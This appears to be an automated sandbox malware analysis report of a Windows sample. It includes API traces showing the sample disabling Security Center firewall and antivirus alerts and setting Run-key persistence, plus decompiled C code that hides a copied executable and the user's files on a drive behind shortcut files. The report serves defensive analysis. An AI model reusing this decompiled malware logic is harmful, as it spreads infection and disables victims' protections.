                                                                                                                                                                                                                                                                                    0x0040603a
                                                                                                                                                                                                                                                                                    0x00406119
                                                                                                                                                                                                                                                                                    0x0040611e
                                                                                                                                                                                                                                                                                    0x0040613c
                                                                                                                                                                                                                                                                                    0x00406142
                                                                                                                                                                                                                                                                                    0x0040615b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040616a
                                                                                                                                                                                                                                                                                    0x00406190
                                                                                                                                                                                                                                                                                    0x0040621b
                                                                                                                                                                                                                                                                                    0x00406222
                                                                                                                                                                                                                                                                                    0x00406227
                                                                                                                                                                                                                                                                                    0x00406230
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406234
                                                                                                                                                                                                                                                                                    0x00406234
                                                                                                                                                                                                                                                                                    0x0040619c
                                                                                                                                                                                                                                                                                    0x004061ab
                                                                                                                                                                                                                                                                                    0x004061b1
                                                                                                                                                                                                                                                                                    0x004061ba
                                                                                                                                                                                                                                                                                    0x004061c1
                                                                                                                                                                                                                                                                                    0x004061c8
                                                                                                                                                                                                                                                                                    0x004061e0
                                                                                                                                                                                                                                                                                    0x00406208
                                                                                                                                                                                                                                                                                    0x00406215
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406215
                                                                                                                                                                                                                                                                                    0x00406049
                                                                                                                                                                                                                                                                                    0x0040606f
                                                                                                                                                                                                                                                                                    0x004060fa
                                                                                                                                                                                                                                                                                    0x00406101
                                                                                                                                                                                                                                                                                    0x00406106
                                                                                                                                                                                                                                                                                    0x0040610f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406113
                                                                                                                                                                                                                                                                                    0x00406113
                                                                                                                                                                                                                                                                                    0x0040607b
                                                                                                                                                                                                                                                                                    0x0040608a
                                                                                                                                                                                                                                                                                    0x00406090
                                                                                                                                                                                                                                                                                    0x00406099
                                                                                                                                                                                                                                                                                    0x004060a0
                                                                                                                                                                                                                                                                                    0x004060a7
                                                                                                                                                                                                                                                                                    0x004060bf
                                                                                                                                                                                                                                                                                    0x004060e7
                                                                                                                                                                                                                                                                                    0x004060f4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004060f4
                                                                                                                                                                                                                                                                                    0x00405fe6
                                                                                                                                                                                                                                                                                    0x00405fe6
                                                                                                                                                                                                                                                                                    0x00405f72
                                                                                                                                                                                                                                                                                    0x00405f78
                                                                                                                                                                                                                                                                                    0x00405f7c
                                                                                                                                                                                                                                                                                    0x00405f89
                                                                                                                                                                                                                                                                                    0x00405f8d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405f8f
                                                                                                                                                                                                                                                                                    0x00405f96
                                                                                                                                                                                                                                                                                    0x00405fa5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405fa5
                                                                                                                                                                                                                                                                                    0x00405fb3
                                                                                                                                                                                                                                                                                    0x00405fb5
                                                                                                                                                                                                                                                                                    0x00405fb8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405fb8
                                                                                                                                                                                                                                                                                    0x00405ebc

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000BB8), ref: 00405E1E
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(2393737939739), ref: 00405E4B
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00405E61
                                                                                                                                                                                                                                                                                    • MoveFileA.KERNEL32(337372927,2282688262), ref: 00405E71
                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32 ref: 00405E81
                                                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,2u9o0b7n), ref: 00405EA1
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405EAD
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00405EBC
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004169D8,00000105), ref: 00405EE2
                                                                                                                                                                                                                                                                                    • PathFindFileNameW.SHLWAPI(004169D8), ref: 00405EED
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00405F0A
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00405F1A
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00405F31
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00405FE6
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00405FFD
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040601B
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00406032
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000003), ref: 00406049
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00406067
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32 ref: 004060E7
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004060F4
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00406113
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040611E
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040613C
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00406153
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000003), ref: 0040616A
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00406188
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32 ref: 00406208
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00406215
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00406234
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040623F
                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 0040625D
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 00406284
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004062A3
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 004062C2
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 004062E1
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406300
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 0040631F
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 0040633E
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040634B
                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 00406369
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 00406390
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004063AF
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 004063CE
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 004063ED
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 0040640C
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 0040642B
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 0040644A
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00406457
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00406462
                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00406484
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040649B
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004064B5
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004043F0,00000000,00000000,00000000), ref: 004064CD
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004064D8
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004054A0,00000000,00000000,00000000), ref: 004064ED
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004064F8
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00405CF0,00000000,00000000,00000000), ref: 0040650D
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00406518
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406535
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Value$File$Sleep$Createwsprintf$CloseExitOpenProcess$CopyThread$AttributesEnvironmentExpandMoveNamePathStrings$DeleteErrorEventExistsFindLastModuleMutexStartup
                                                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbcmds.dat$%s\tbnds.dat$%userprofile%$%windir%$038038$2282688262$2393737939739$297973937,$2u9o0b7n$333383737$337372927$33973397337$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$Z#
                                                                                                                                                                                                                                                                                    • API String ID: 2549499605-945890190
                                                                                                                                                                                                                                                                                    • Opcode ID: f746adeada96446dc3245649bddd4a9d991eb45b4019eb8eef4e2c3d2dac2882
                                                                                                                                                                                                                                                                                    • Instruction ID: 83af2952ddda4d09f50abae1b8075a5cb95368c24024515adc0fadd5cc82fc98
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f746adeada96446dc3245649bddd4a9d991eb45b4019eb8eef4e2c3d2dac2882
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1122EB1B80318ABE7209B50DC4AFD97774EB48B05F5081A5B309AA1D1D7F4AAC4CF5D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 68 404fc0-404fd5 _chkstk 69 404fd7-404fd9 68->69 70 404fde-405090 wsprintfW * 5 PathFileExistsW 68->70 71 405495-405498 69->71 72 405092-4050b3 call 40d180 70->72 73 4050d4-4050e3 PathFileExistsW 70->73 72->73 82 4050b5-4050ce SetFileAttributesW DeleteFileW 72->82 74 405150-40515f PathFileExistsW 73->74 75 4050e5-4050f4 PathFileExistsW 73->75 79 405161-405167 74->79 80 4051a6-4051c7 FindFirstFileW 74->80 77 4050f6-405107 CreateDirectoryW 75->77 78 405118-405127 PathFileExistsW 75->78 77->78 85 405109-405112 SetFileAttributesW 77->85 78->74 86 405129-40513f CopyFileW 78->86 87 405181-405194 call 404d70 79->87 88 405169-40517f call 404d70 79->88 83 4051cd-405285 80->83 84 40548f 80->84 82->73 89 40528f-4052a3 lstrcmpW 83->89 84->71 85->78 86->74 90 405141-40514a SetFileAttributesW 86->90 97 405197-4051a0 SetFileAttributesW 87->97 88->97 93 4052a5-4052b9 lstrcmpW 89->93 94 4052bb 89->94 90->74 93->94 98 4052c0-4052d1 93->98 99 405466-40547c FindNextFileW 94->99 97->80 100 4052e2-4052e9 98->100 101 4052d3-4052dc 98->101 99->89 102 405482-405489 FindClose 99->102 103 405317-405320 100->103 104 4052eb-405308 lstrcmpiW 100->104 101->100 102->84 107 405322 103->107 108 405327-405338 103->108 105 40530a 104->105 106 40530c-405313 104->106 105->101 106->103 107->99 109 405349-405350 108->109 110 4053c0-4053c9 109->110 111 405352-40536f PathMatchSpecW 109->111 114 4053d0-4053df PathFileExistsW 110->114 115 4053cb 110->115 112 405371 111->112 113 405373-4053b9 wsprintfW SetFileAttributesW DeleteFileW 111->113 112->109 113->110 117 4053e1 114->117 118 4053e6-405436 wsprintfW * 2 114->118 115->99 117->99 119 405450-405460 MoveFileExW 118->119 120 405438-40544e call 404e80 118->120 119->99 120->99
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404FC0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				short _v1044;
                                                                                                                                                                                                                                                                                    				short _v1564;
                                                                                                                                                                                                                                                                                    				short _v2084;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2088;
                                                                                                                                                                                                                                                                                    				short _v2612;
                                                                                                                                                                                                                                                                                    				short _v3132;
                                                                                                                                                                                                                                                                                    				char _v3133;
                                                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAW _v3732;
                                                                                                                                                                                                                                                                                    				short _v4252;
                                                                                                                                                                                                                                                                                    				void* _v4256;
                                                                                                                                                                                                                                                                                    				short _v4780;
                                                                                                                                                                                                                                                                                    				intOrPtr _v4784;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4788;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4792;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4796;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4800;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4804;
                                                                                                                                                                                                                                                                                    				intOrPtr _v4808;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4812;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4816;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4820;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4824;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4828;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4832;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4836;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4840;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4844;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4848;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4852;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4856;
                                                                                                                                                                                                                                                                                    				WCHAR* _v4860;
                                                                                                                                                                                                                                                                                    				signed char _v4861;
                                                                                                                                                                                                                                                                                    				signed char _v4862;
                                                                                                                                                                                                                                                                                    				signed int _v4868;
                                                                                                                                                                                                                                                                                    				signed int _v4872;
                                                                                                                                                                                                                                                                                    				intOrPtr _t167;
                                                                                                                                                                                                                                                                                    				intOrPtr _t195;
                                                                                                                                                                                                                                                                                    				void* _t218;
                                                                                                                                                                                                                                                                                    				void* _t219;
                                                                                                                                                                                                                                                                                    				void* _t224;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0040EE0A();
                                                                                                                                                                                                                                                                                    				if((_a12 & 0x00080000) != 0) {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v2088 = 0x415124;
                                                                                                                                                                                                                                                                                    				_v3133 = 0;
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                                    				_t224 = _t219 + 0x48;
                                                                                                                                                                                                                                                                                    				if(PathFileExistsW( &_v4780) != 0) {
                                                                                                                                                                                                                                                                                    					_t167 = E0040D180( &_v4780);
                                                                                                                                                                                                                                                                                    					_t224 = _t224 + 4;
                                                                                                                                                                                                                                                                                    					_v4784 = _t167;
                                                                                                                                                                                                                                                                                    					_t195 =  *0x4163b8; // 0x0
                                                                                                                                                                                                                                                                                    					if(_t195 != _v4784) {
                                                                                                                                                                                                                                                                                    						SetFileAttributesW( &_v4780, 0x80);
                                                                                                                                                                                                                                                                                    						DeleteFileW( &_v4780);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(PathFileExistsW( &_v4780) == 0) {
                                                                                                                                                                                                                                                                                    					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                                                                                                                                                                                                                    						SetFileAttributesW( &_v4252, 2);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(0x4163c0,  &_v4780, 0) != 0) {
                                                                                                                                                                                                                                                                                    						SetFileAttributesW( &_v4780, 2);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(PathFileExistsW( &_v2612) == 0) {
                                                                                                                                                                                                                                                                                    					if((_a16 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    						E00404D70( &_v2612, L"shell32.dll", 8);
                                                                                                                                                                                                                                                                                    						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						E00404D70( &_v2612, L"shell32.dll", 9);
                                                                                                                                                                                                                                                                                    						_t224 = _t224 + 0xc;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					SetFileAttributesW( &_v2612, 1);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                                                                                                                                                                                                                    				if(_v4256 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    					L45:
                                                                                                                                                                                                                                                                                    					return _v3133;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v4860 = L"*.lnk";
                                                                                                                                                                                                                                                                                    					_v4856 = L"*.vbs";
                                                                                                                                                                                                                                                                                    					_v4852 = L"*.js";
                                                                                                                                                                                                                                                                                    					_v4848 = L"*.scr";
                                                                                                                                                                                                                                                                                    					_v4844 = L"*.com";
                                                                                                                                                                                                                                                                                    					_v4840 = L"*.jse";
                                                                                                                                                                                                                                                                                    					_v4836 = L"*.cmd";
                                                                                                                                                                                                                                                                                    					_v4832 = L"*.pif";
                                                                                                                                                                                                                                                                                    					_v4828 = L"*.jar";
                                                                                                                                                                                                                                                                                    					_v4824 = L"*.dll";
                                                                                                                                                                                                                                                                                    					_v4820 = L"*.vbe";
                                                                                                                                                                                                                                                                                    					_v4816 = L"*.bat";
                                                                                                                                                                                                                                                                                    					_v4812 = L"*.inf";
                                                                                                                                                                                                                                                                                    					_v4808 = _v2088;
                                                                                                                                                                                                                                                                                    					_v4804 =  &_v1564;
                                                                                                                                                                                                                                                                                    					_v4800 = L"Thumbs.db";
                                                                                                                                                                                                                                                                                    					_v4796 = L"$RECYCLE.BIN";
                                                                                                                                                                                                                                                                                    					_v4792 = L"desktop.ini";
                                                                                                                                                                                                                                                                                    					_v4788 = L"System Volume Information";
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                                    							_v4862 = 0;
                                                                                                                                                                                                                                                                                    							_v4868 = 0;
                                                                                                                                                                                                                                                                                    							while(_v4868 < 6) {
                                                                                                                                                                                                                                                                                    								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                                                                                                                                                                                                                    									_v4862 = 1;
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v4868 = _v4868 + 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if((_v4862 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    								_v4861 = 0;
                                                                                                                                                                                                                                                                                    								_v4872 = 0;
                                                                                                                                                                                                                                                                                    								while(_v4872 < 0xd) {
                                                                                                                                                                                                                                                                                    									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                                                                                                                                                                                                                    										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                                    										_t224 = _t224 + 0x10;
                                                                                                                                                                                                                                                                                    										SetFileAttributesW( &_v2084, 0x80);
                                                                                                                                                                                                                                                                                    										DeleteFileW( &_v2084);
                                                                                                                                                                                                                                                                                    										_v4861 = 1;
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v4872 = _v4872 + 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								if((_v4861 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    									if(PathFileExistsW( &_v4252) != 0) {
                                                                                                                                                                                                                                                                                    										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                                    										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                                                                                                                                                                                                                    										_t224 = _t224 + 0x24;
                                                                                                                                                                                                                                                                                    										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                                    											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											E00404E80( &_v3132,  &_v524);
                                                                                                                                                                                                                                                                                    											_t224 = _t224 + 8;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L43:
                                                                                                                                                                                                                                                                                    					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                                                                                                                                                                                                                    					FindClose(_v4256);
                                                                                                                                                                                                                                                                                    					goto L45;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}












































                                                                                                                                                                                                                                                                                    0x00404fc8
                                                                                                                                                                                                                                                                                    0x00404fd5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00404fd7
                                                                                                                                                                                                                                                                                    0x00404fde
                                                                                                                                                                                                                                                                                    0x00404fe8
                                                                                                                                                                                                                                                                                    0x00404fff
                                                                                                                                                                                                                                                                                    0x0040501f
                                                                                                                                                                                                                                                                                    0x0040503f
                                                                                                                                                                                                                                                                                    0x0040505f
                                                                                                                                                                                                                                                                                    0x00405078
                                                                                                                                                                                                                                                                                    0x0040507e
                                                                                                                                                                                                                                                                                    0x00405090
                                                                                                                                                                                                                                                                                    0x00405099
                                                                                                                                                                                                                                                                                    0x0040509e
                                                                                                                                                                                                                                                                                    0x004050a1
                                                                                                                                                                                                                                                                                    0x004050a7
                                                                                                                                                                                                                                                                                    0x004050b3
                                                                                                                                                                                                                                                                                    0x004050c1
                                                                                                                                                                                                                                                                                    0x004050ce
                                                                                                                                                                                                                                                                                    0x004050ce
                                                                                                                                                                                                                                                                                    0x004050b3
                                                                                                                                                                                                                                                                                    0x004050e3
                                                                                                                                                                                                                                                                                    0x004050f4
                                                                                                                                                                                                                                                                                    0x00405112
                                                                                                                                                                                                                                                                                    0x00405112
                                                                                                                                                                                                                                                                                    0x00405127
                                                                                                                                                                                                                                                                                    0x0040514a
                                                                                                                                                                                                                                                                                    0x0040514a
                                                                                                                                                                                                                                                                                    0x00405127
                                                                                                                                                                                                                                                                                    0x0040515f
                                                                                                                                                                                                                                                                                    0x00405167
                                                                                                                                                                                                                                                                                    0x0040518f
                                                                                                                                                                                                                                                                                    0x00405194
                                                                                                                                                                                                                                                                                    0x00405169
                                                                                                                                                                                                                                                                                    0x00405177
                                                                                                                                                                                                                                                                                    0x0040517c
                                                                                                                                                                                                                                                                                    0x0040517c
                                                                                                                                                                                                                                                                                    0x004051a0
                                                                                                                                                                                                                                                                                    0x004051a0
                                                                                                                                                                                                                                                                                    0x004051ba
                                                                                                                                                                                                                                                                                    0x004051c7
                                                                                                                                                                                                                                                                                    0x0040548f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004051cd
                                                                                                                                                                                                                                                                                    0x004051cd
                                                                                                                                                                                                                                                                                    0x004051d7
                                                                                                                                                                                                                                                                                    0x004051e1
                                                                                                                                                                                                                                                                                    0x004051eb
                                                                                                                                                                                                                                                                                    0x004051f5
                                                                                                                                                                                                                                                                                    0x004051ff
                                                                                                                                                                                                                                                                                    0x00405209
                                                                                                                                                                                                                                                                                    0x00405213
                                                                                                                                                                                                                                                                                    0x0040521d
                                                                                                                                                                                                                                                                                    0x00405227
                                                                                                                                                                                                                                                                                    0x00405231
                                                                                                                                                                                                                                                                                    0x0040523b
                                                                                                                                                                                                                                                                                    0x00405245
                                                                                                                                                                                                                                                                                    0x00405255
                                                                                                                                                                                                                                                                                    0x00405261
                                                                                                                                                                                                                                                                                    0x00405267
                                                                                                                                                                                                                                                                                    0x00405271
                                                                                                                                                                                                                                                                                    0x0040527b
                                                                                                                                                                                                                                                                                    0x00405285
                                                                                                                                                                                                                                                                                    0x0040528f
                                                                                                                                                                                                                                                                                    0x004052a3
                                                                                                                                                                                                                                                                                    0x004052c0
                                                                                                                                                                                                                                                                                    0x004052c7
                                                                                                                                                                                                                                                                                    0x004052e2
                                                                                                                                                                                                                                                                                    0x00405308
                                                                                                                                                                                                                                                                                    0x0040530c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040530c
                                                                                                                                                                                                                                                                                    0x004052dc
                                                                                                                                                                                                                                                                                    0x004052dc
                                                                                                                                                                                                                                                                                    0x00405320
                                                                                                                                                                                                                                                                                    0x00405327
                                                                                                                                                                                                                                                                                    0x0040532e
                                                                                                                                                                                                                                                                                    0x00405349
                                                                                                                                                                                                                                                                                    0x0040536f
                                                                                                                                                                                                                                                                                    0x0040538a
                                                                                                                                                                                                                                                                                    0x00405390
                                                                                                                                                                                                                                                                                    0x0040539f
                                                                                                                                                                                                                                                                                    0x004053ac
                                                                                                                                                                                                                                                                                    0x004053b2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004053b2
                                                                                                                                                                                                                                                                                    0x00405343
                                                                                                                                                                                                                                                                                    0x00405343
                                                                                                                                                                                                                                                                                    0x004053c9
                                                                                                                                                                                                                                                                                    0x004053df
                                                                                                                                                                                                                                                                                    0x004053fd
